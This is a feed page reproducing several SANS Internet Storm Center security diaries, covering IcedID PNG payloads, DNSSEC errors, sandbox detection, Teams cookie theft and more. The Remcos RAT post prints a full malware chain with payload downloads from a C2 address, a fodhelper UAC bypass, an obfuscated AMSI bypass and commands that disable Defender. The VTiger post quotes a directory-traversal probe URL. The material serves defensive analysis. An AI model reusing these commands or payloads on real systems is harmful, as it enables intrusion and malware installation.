SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 54 perc 40 másodperc
2022. szeptember 29.

PNG Analysis, (Thu, Sep 29th)

I updated my tool pngdump.py to deal with all the different samples tagged with PNG on MalwareBazaar.

The analysis results of a normal PNG file looks like this:

But I also had samples that were not valid PNG files: The data of the IDAT chunk(s) was not ZLIB compressed. Notice the decompression error:

According to MalwareBazaar's info for these files, they were PNG files with an encrypted IcedID payload.

So I set out to write a small script that would help me detect PNG files carrying an IcedID payload.

There are a couple of decryptors online, like this one and this one. The payload is RC4 encrypted, and the RC4 key is in front of the payload (8 bytes long). One decryptor extracted the key from position 0 in the chunk data, another from position 5.

Decrypting this payload is not difficult, thus I wrote a small script for my translate.py tool. It has 2 functions: Check and Decrypt.

I use Check to validate that the PNG I'm analyzing, is an IcedID payload:

The key is found at offset 5, and the header and other metadata indicate that this is indeed IncedID.

If you want the decrypted payload, use function Decrypt, for example like this:

Here is another example with offset 0:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 29.

ISC Stormcast For Thursday, September 29th, 2022 https://isc.sans.edu/podcastdetail.html?id=8194, (Thu, Sep 29th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 28.

10 Years Later: Attacker re-discovering old VTiger CRM Vulnerability?, (Wed, Sep 28th)

Legacy software has a way of "hanging around." Just about a week ago I was reminded of a website I created for a friend in or around 1998, which has not changed since then (embarrassing links omitted). It went down after an upgrade to PHP 8.1 ;-). 

So it isn't surprising that ever so often, attackers are probing for some old flaws again. The following URL made our "First Seen" list this week:

/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fasterisk%2fsip.conf%00

A quick search shows that VTiger 5.1.0 was affected by a directory traversal vulnerability that could lead to arbitrary file inclusion (CVE-2012-4876). The exploit looks for an Asterisk configuration file, likely to exfiltrate credentials.

We have seen more and more attempts to go after VoIP configurations, brute forcing VoIP credentials or gaining access to respective APIs. There is a lot of pressure right now to clamp down on spam calls and SMS messages. Telcos are more likely to filter spam, and third-party software is becoming more popular. It is a bit like email spam, where attackers are for many years now been interested in compromising accounts with large email providers just to use them to send spam. Attackers are looking for "clean" phone numbers to send their messages from. After all, how else will you get that extended warranty for your car? I recently wrote about some SIP brute forcing that appeared to be more linked to toll fraud, but using these systems for spam is another way to monetize compromised VoIP systems.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 28.

ISC Stormcast For Wednesday, September 28th, 2022 https://isc.sans.edu/podcastdetail.html?id=8192, (Wed, Sep 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 27.

DNS Option 15: Debugging DNSSEC Errors., (Tue, Sep 27th)

DNSSEC has had a rough ride so far. I usually say that the mistake made with DNSSEC was that security came first in the design, ahead of usability. The result is that the implementation of DNSSEC is usually compliance driven and not widespread. There are two parts to implementing DNSSEC:

  • DNSSEC Validation: This is done by resolvers. A resolver may check if a record it receives is correctly signed before forwarding it. This is pretty easy to implement in resolvers, and many large public resolvers validate DNSSEC, and by doing so, they protect their users. You typically just need to enable the feature and ensure the current root zone key is configured correctly.
  • DNSSEC Signing: By digitally signing zone data (adding RRSIG and the necessary DNSKEY records), a particular zone is protected with DNSSEC. This is tricky as these signatures need to be maintained, and DS records verifying the keys need to be maintained with your registrar/parent zone. If you mess up, your zone will no longer resolve as long as the resolver validates the signatures.

One important issue is the "DS" record. Lets quickly review how DNSSEC works:

  1. For each zone ("domain"), you create one or more "Key Signing Keys"
  2. You use the Key Signing Key to sign some "Zone Signing Keys"
  3. The "Zone Signing Key" is used to create signatures for individual records.

Why the two keys? This is to optimize the tradeoff between key strengths, speed, and the need to maintain and rotate the keys.

The critical record here is the "DS" record: How does a resolver know that a zone is signed with DNSSEC, and which key to trust? The resolver for the parent zone will offer a DS record. This record is a hash of any Key Signing Key used by the zone. And this is why there are two keys:

Key Signing Key (KSK): longer key does not often change as it is a pain in some cases to update the corresponding DS record with the parent zone.
Zone Signing Key (ZSK): shorter key. This way, the crypto is simpler/faster, and we rotate the key more often. It is signed using the KSK.

So, in short: no DS record -> no DNSSEC. If there is a DS record: you better make sure DNSSEC works for your zone, or you end up with a self inflicted DoS (done this a few times as you will see)

I recently set up a new zone for internal use: sti-admin.com. I usually host my zones with Google, and Google makes DNSSEC pretty easy: You check a checkbox, and you are good to go. But, I wanted to do it the hard way because I needed a bit more flexibility for this domain to do dynamic updates and such. Now... I didn't want to skip DNSSEC as I somewhat believe in doing things securely no matter the pain. As I say: My shadow IT has its own shadow security stack. 

So I experimented with a BIND9 feature to automatically sign the zones. In the past, you had to run a script to add signature records to your zone file. This meant that you had to do some scripting to rotate keys and resign the zone ever so often, and it didn't work well with dynamic updates. BIND introduced a feature to have the nameserver itself create the signature records "on the fly". All you do is add a "dnssec-policy" option to the zone. You may create your own policy if you do not like the default policy. But once you did that, you are good to go. Reload the configuration and named will automatically create keys and signature records.

But you still have to provide your registrar with the DS records so they can be signed by the parent zone. For Google, you do that via a simple form on their website.

Initially, I actually got it right, and it worked (amazing!). See below the graph from dnsviz.net, a great site to verify DNSSEC deployments.

But... why stop here? You learn if things go wrong!

So I wasn't happy with some of the configurations and started experimenting with different policies. Sadly, that broke things. And as I said: That is where you start learning. I did observe that the public resolver at '1.1.1.1' is answering in a peculiar way if DNSSEC is broken:

% dig sti-admin.com @1.1.1.1

; <<>> DiG 9.10.6 <<>> sti-admin.com @1.1.1.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 52403
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; OPT=15: 00 0a 66 61 69 6c 65 64 20 74 6f 20 76 65 72 69 66 79 20 73 69 67 6e 61 74 75 72 65 73 20 66 6f 72 20 73 74 69 2d 61 64 6d 69 6e 2e 63 6f 6d 2e 20 6f 70 74 2d 6f 75 74 20 70 72 6f 6f 66 ("..failed to verify signatures for sti-admin.com. opt-out proof")
;; QUESTION SECTION:
;sti-admin.com.            IN    A

;; Query time: 124 msec
;; SERVER: 1.1.1.1#53(1.1.1.1)
;; WHEN: Tue Sep 27 08:42:13 EDT 2022
;; MSG SIZE  rcvd: 108

It uses an "Option 15" to provide a human-readable error message! Who would have thought about a user-friendly feature like that? The "dig" utility even displays this nicely for you.

I have not seen this from other nameservers, so this may be a Cloudflare special. But thanks, Cloudflare! :). The option is introduced in RFC 8914.  The option isn't just useful for DNSSEC, but could be used any time a query fails, and the DNS server would like to return more details vs just a simple "ServFail" error.

Here is the complete packet:

08:41:40.176092 IP (tos 0x0, ttl 58, id 49070, offset 0, flags [DF], proto UDP (17), length 136)
    1.1.1.1.53 > 10.5.1.126.56671: [udp sum ok] 52403 ServFail q: A? sti-admin.com. 0/0/1 ar: . OPT UDPsize=1232 (108)
    0x0000:  4500 0088 bfae 4000 3a11 7332 0101 0101  E.....@.:.s2....
    0x0010:  0a05 017e 0035 dd5f 0074 7319 ccb3 8182  ...~.5._.ts.....
    0x0020:  0001 0000 0000 0001 0973 7469 2d61 646d  .........sti-adm
    0x0030:  696e 0363 6f6d 0000 0100 0100 0029 04d0  in.com.......)..
    0x0040:  0000 0000 0042 000f 003e 000a 6661 696c  .....B...>..fail
    0x0050:  6564 2074 6f20 7665 7269 6679 2073 6967  ed.to.verify.sig
    0x0060:  6e61 7475 7265 7320 666f 7220 7374 692d  natures.for.sti-
    0x0070:  6164 6d69 6e2e 636f 6d2e 206f 7074 2d6f  admin.com..opt-o
    0x0080:  7574 2070 726f 6f66                      ut.proof

I highlighted the option data in red and underlined it:

000f - 15 the option-code
003e - length (62 Bytes)
000a - Info-Code. 10 = RRSIGs Missing

followed by the text description of the error.

Next step: A snort signature to alert me if one of my zones is badly signed, triggering this error :). But maybe a cron job to resolve them via 1.1.1.1 will be easier to detect errors.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 27.

ISC Stormcast For Tuesday, September 27th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8190, (Tue, Sep 27th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 26.

Easy Python Sandbox Detection , (Mon, Sep 26th)

Many malicious Python scripts implement a sandbox detection mechanism, I already wrote diaries about this[1], but it requires some extra code in the script. Because we are lazy (attackers too), why not try to automate this and easily detect the presence of such a security mechanism?

I spotted an interesting script (VT score 3/60) that uses a Python library I met for the first time: "sandboxed". It has a method to detect the presence of a sandbox easily:

from sandboxed import is_sandboxed import sys certainty = is_sandboxed(logging=False) if int(certainty)>0.5: sys.exit() import zlib,base64,ssl,socket,struct,time [...]

The library project repository[2] explains the checks performed:

  • Machine specifications
  • File systems
  • Internet access

For sure, it's not bulletproof, but it could probably spot a lot of sandboxes! Note that this module focuses on Windows sandboxes, I had a look at the code, and there are only references to Windows artifacts:

_FILES = [ r"C:\WINDOWS\system32\drivers\VBoxMouse.sys", r"C:\WINDOWS\system32\drivers\VBoxGuest.sys", r"C:\WINDOWS\system32\drivers\VBoxSF.sys", r"C:\WINDOWS\system32\drivers\VBoxVideo.sys", r"C:\WINDOWS\system32\vboxdisp.dll", r"C:\WINDOWS\system32\vboxhook.dll", r"C:\WINDOWS\system32\vboxmrxnp.dll", r"C:\WINDOWS\system32\vboxogl.dll", r"C:\WINDOWS\system32\vboxoglarrayspu.dll", r"C:\WINDOWS\system32\vboxoglcrutil.dll", r"C:\WINDOWS\system32\vboxoglerrorspu.dll", r"C:\WINDOWS\system32\vboxoglfeedbackspu.dll", r"C:\WINDOWS\system32\vboxoglpackspu.dll", r"C:\WINDOWS\system32\vboxoglpassthroughspu.dll", r"C:\WINDOWS\system32\vboxservice.exe", r"C:\WINDOWS\system32\vboxtray.exe", r"C:\WINDOWS\system32\VBoxControl.exe", r"C:\WINDOWS\system32\drivers\vmmouse.sys", r"C:\WINDOWS\system32\drivers\vmhgfs.sys", r"C:\WINDOWS\system32\drivers\vmusbmouse.sys", r"C:\WINDOWS\system32\drivers\vmkdb.sys", r"C:\WINDOWS\system32\drivers\vmrawdsk.sys", r"C:\WINDOWS\system32\drivers\vmmemctl.sys", r"C:\WINDOWS\system32\drivers\vm3dmp.sys", r"C:\WINDOWS\system32\drivers\vmci.sys", r"C:\WINDOWS\system32\drivers\vmsci.sys", r"C:\WINDOWS\system32\drivers\vmx_svga.sys" ] _PROCESSES = [ "vboxservices.exe", "vboxservice.exe", "vboxtray.exe", "xenservice.exe", "VMSrvc.exe", "vemusrvc.exe", "VMUSrvc.exe", "qemu-ga.exe", "prl_cc.exe", "prl_tools.exe", "vmtoolsd.exe", "df5serv.exe", ]

[1] https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534
[2] https://github.com/frederikme/sandboxed

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 26.

ISC Stormcast For Monday, September 26th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8188, (Mon, Sep 26th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 25.

Downloading Samples From Takendown Domains, (Sun, Sep 25th)

Sometimes I want to download a sample from a malicious server, but the domain name no longer resolves (it has been taken down).

In that case, I search historical DNS data for the IPv4 address of the server. And then connect to the server via its IPv4 address, like this:

That often fails, because the server is hosting many sites.

In that case, I add a Host header with the domain name:

This works regularly for me, because the domain has been taken down, but the server/file not (yet).

For TLS, we will get an error:

That's because we are using an IPv4 address in stead of a domain name.

In that case, I use option --insecure to ignore certificate errors:

When I download samples, I also use other options to go over a proxy/Tor and to log extra information, like response headers and a trace.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 25.

Maldoc Analysis Info On MalwareBazaar, (Sat, Sep 24th)

When you lookup a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

So if you suspect that a document you received is malicious, you can look it up on or submit it to malwarebazaar, and have an initial analysis, without local tools.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 23.

Kids Like Cookies, Malware Too&#x21;, (Fri, Sep 23rd)

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies %AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file looks indeed for Teams cookies but even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family...

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 23.

ISC Stormcast For Friday, September 23rd, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8186, (Fri, Sep 23rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 22.

RAT Delivered Through FODHelper , (Thu, Sep 22nd)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.

The script, called "2.bat", is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66 ..&cls..@echo of 00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a f ..Title %~n0.. 00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f Mode 60,3 ..colo 00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368 r 0B..echo(..ech 00000040: 6f20 2020 2020 2020 2020 506c 6561 7365 o Please 00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65 wait... a while 00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e Loading data .. 00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620 ....CERTUTIL -f

Here is the decoded script:

cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 cls "%Temp%\2.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5 cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1 dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5 cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE ZWwgJX4wIA0K -----END CERTIFICATE-----

certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the "%~f0" which returns the full path of the batch file itself. Here is the bat file:

@echo off echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished. curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1 timeout 5 > nul curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat timeout 5 > nul curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs timeout 5 > nul powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force fodhelper exit Del %~0

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls @echo off Title %~n0 Mode 60,3 color 0B echo( echo Please wait... a while Loading data .... CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1 cls "%Temp%\adhd - Copia.bat" Exit -----BEGIN CERTIFICATE----- QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0 YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K -----END CERTIFICATE-----

The decoded Base64 contains:

@echo off echo Almost finished: it will autoruns in less than 15 seconds! cd %USERPROFILE%\Links\ PowerShell -ExecutionPolicy Bypass -File "puedo.ps1" echo Almost finished: it will autoruns in less than 15 seconds! timeout 10 > nul start net.vbs exit Del %~0

The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) Set-MpPreference -DisableRealtimeMonitoring $trUE Set-MpPreference -DisableIOAVProtection $trUE powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:" powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\" curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120')) cd C:\Users\$env:USERNAME\Links .\zoey.exe exit

Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{   "c2": [ "171[.]22[.]30[.]7:5578" ], "attr": { "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS", "copy_file": "Isass.exe", "hide_file": false, "copy_folder": "Microsoft Updater", "delete_file": false, "keylog_file": "logs.dat", "keylog_flag": false, "audio_folder": "MicRecords", "install_flag": true, "install_path": "%ProgramFiles%", "keylog_crypt": false, "mouse_option": false, "connect_delay": "0", "keylog_folder": "remcos", "startup_value": "Windows Host Controller", "screenshot_flag": false, "screenshot_path": "%AppData%", "screenshot_time": "10", "connect_interval": "1", "hide_keylog_file": false, "screenshot_crypt": false, "audio_record_time": "5", "screenshot_folder": "Screenshots", "take_screenshot_time": "5", "take_screenshot_option": false }, "rule": "Remcos", "botnet": "Papero", "family": "remcos" }

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 22.

ISC Stormcast For Thursday, September 22nd, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8184, (Thu, Sep 22nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 21.

Phishing Campaigns Use Free Online Resources, (Wed, Sep 21st)

A phishing campaign needs some resources: bandwidth, CPU, storage, … For a very long time, a lot of phishing kits have been hosted on compromised servers. The most popular are CMS with weak configurations or outdated. I think that Wordpress is the number one in this category. By careful, it does not mean that Wordpress is a bad CMS. Most vulnerabilities are introduced through plugins. Once compromised, the phishing kit files are copied on the server and usually are reachable via the /wp-content/ or /wp-plugin/ directories.

I’m receiving daily a lot of phishing emails, via my own platform or submitted by readers and I see that there is slightly move to leave compromised servers to free online services. Internet is full of “*aaS” websites, "Something as a Service" (Forms, Storage, …). Many platforms offer a free subscription to attract customers. Most of the time, these free accounts allow attackers to upload malicious content.

Compromised CMS have issues:

  1. You need to search and compromise new servers constantly
  2. Those servers IP addresses or domains are quickly indexed in block lists
  3. If a server has been compromised once, it may be compromised again by a competitor
  4. Servers might be limited in resources (bandwidth, CPU, …)
  5. The server might be cleaned by the owner or admin (or not ;-)

At the opposite, free services have huge advantages:

  1. They can’t be easily blocked (IP & domains can be added to block lists)
  2. They offer plenty of resources, are reliable
  3. Malicious traffic might remain below the radar for a while

Let review some examples. If you need to host files (logos, scripts, ...), files.catbox.moe will be helpful:

If you search to host a form and get data delivered straight in your mailbox, formsubmit.co will be helpful:

Other services look more "technical" but can be also abused by attackers lile ipfs.io:

Here is an example of link found in the wild:

https://ipfs.io/ipfs/bafkreialspsmcfrukiforbhy4onop7yasjotzehubagyuxhw5rpcafsxmm#xavier@<domain>

(The link is gone now)

The web is full of motivated people that offer some resources for free (I remember when I was offering free Linux shells in the years 2000). Be careful, if you offer a free service, they are chances that it will be discovered and abused by attackers!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 21.

ISC Stormcast For Wednesday, September 21st, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8182, (Wed, Sep 21st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 20.

ISC Stormcast For Tuesday, September 20th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8180, (Tue, Sep 20th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 20.

Chainsaw: Hunt, search, and extract event log records, (Mon, Sep 19th)

I first spotted Chainsaw courtesy of Florian Roth’s Twitter feed given that Chainsaw favors using Sigma as one of its rule engines. Chainsaw is a standalone tools that provides a simple and fast method to triage Windows event logs and identify interesting elements within the logs while applying detection logic (Sigma and Chainsaw) to detect malicious activity. Chainsaw’s powerful ‘first-response’ capability offers a generic and fast method of searching through event logs for keywords (Kornitzer & D, 2022).

The Chainsaw project documentation is robust. As always, read up on the project before use, it makes use of other great projects as well. James and Alex have provided all you need to get started in short order.

I conducted my first experiment using logs from a DFIR consulting gig I had circa 2014 with an impacted manufacturing firm. The victim user and system names have been changed to protect the innocent.
The environment was a very flat Windows environment with a .local domain that was not administered in keeping with best practices. The organization’s controllers were compromised, both the accountant and the domain ;-), leading to a significant financial loss for the organization. As such, I’ve simply changed the user name to CONTROLLER, and the domain to victimsystems.local. The related logs from this event, for purposes of this experiment, were stored in logs/client. In order to change names as described I simply wrote the results to a text file when running Chainsaw as follows:

chainsaw hunt logs/client/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml > results\results.txt

I also ran Chainsaw this way when I discovered that results written to the console are more comprehensive than those written out to CSV with the --csv --output results option. This run exclusively used Sigma rules as noted via -s Sigma.

Figure 1: First Chainsaw experiment

The results were revealing, and in keeping with my original investigation eight years ago. The victim system was thoroughly infested with malware, amongst which I’d identified Trojan.Agent.FSAVXGen, also known as Backdoor:Win32/Simda, a backdoor usually dropped by other malware or downloaded users visiting malicious sites. Chainsaw’s results revealed this malware in the victim system security log with Sigma’s Failed Code Integrity Checks and Remote Service Creation as seen in Figure 2.

Figure 2: Chainsaw reveals Backdoor:Win32/Simda

Note the kernel mode driver, and a service named xina.exe, but the real IOC is the failed code integrity check for l3codeca.acm, a common indicator for this malware.

My second experiment included the use of Florian’s APT Simulator on one of my Windows systems. APTSimulator is exactly what it says it is, delivered via is a Windows batch script that uses a set of tools and output files to make a system look as if it was compromised (Roth, 2022).
I chose to run every option, which is complete overkill, but fun nonetheless. I then saved the system’s security event log as APTsim.evtx and ran it through Chainsaw as follows:

chainsaw hunt logs/APTsim.evtx -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ > results\APTsimResults.txt

Note that this Chainsaw run included -r rules, which incorporates Chainsaw’s built-in rule set as well. From th APTsim.evtx assessment, Chainsaw rules identified Account Tampering (APT Simulator added an admin to the local administrator’s group), while Sigma rules flagged Generic Password Dumper Activity on LSASS (procdump64.exe), Remote Service Creation (PSEXESVC.EXE), and Rare Schtasks Creations (falshupdate22).

Figure 3: Chainsaw identifies APT Simulator behaviors

This is an extremely useful tool when you need a fast way to hunt in Windows event logs with all the benefits of Sigma and speed. I really enjoyed the opportunity to experiment with Chainsaw, appreciate the project leads for their work, as well as the excellent dependencies Chainsaw takes in Sigma, the EVTX parser, and the TAU Engine. Great stuff all around. In the name of my favorite deathcore band, Whitechapel, “the saw is the law”!

Cheers…until next time.

Russ McRee | @holisticinfosec

 

References: Countercept, (2022, August). Rapidly Search and Hunt through Windows Event Logs. Github. Retrieved September 15, 2022, from https://github.com/WithSecureLabs/chainsaw

Roth, F. (2022, June 20). NextronSystems/APTSimulator: A toolset to make a system look as if it was the victim of an apt attack. GitHub. Retrieved September 18, 2022, from https://github.com/NextronSystems/APTSimulator

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 19.

ISC Stormcast For Monday, September 19th, 2022 https://isc.sans.edu/podcastdetail.html&#x3f;id=8178, (Mon, Sep 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2022. szeptember 19.

Preventing ISO Malware , (Sun, Sep 18th)

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

  

Initial infection 

 The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below is the results of a user that got infected 

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

 

